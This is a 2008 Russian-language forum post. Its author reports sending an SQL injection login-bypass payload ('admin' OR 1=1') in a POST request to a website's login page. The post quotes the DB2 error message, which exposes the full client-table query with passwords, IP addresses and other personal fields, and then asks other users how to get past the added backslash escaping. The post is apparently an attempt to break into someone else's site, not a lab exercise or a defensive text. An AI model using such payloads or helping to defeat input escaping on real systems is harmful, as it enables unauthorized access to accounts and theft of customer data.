Показать сообщение отдельно

  #2857  
Старый 06.08.2008, 16:54
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355

Репутация: 9
По умолчанию

есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос

Код:
login=admin'+OR+1=1&password=qwerty
выдает следующую ошибку

Код:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...

кто что может посоветовать ???
 
Ответить с цитированием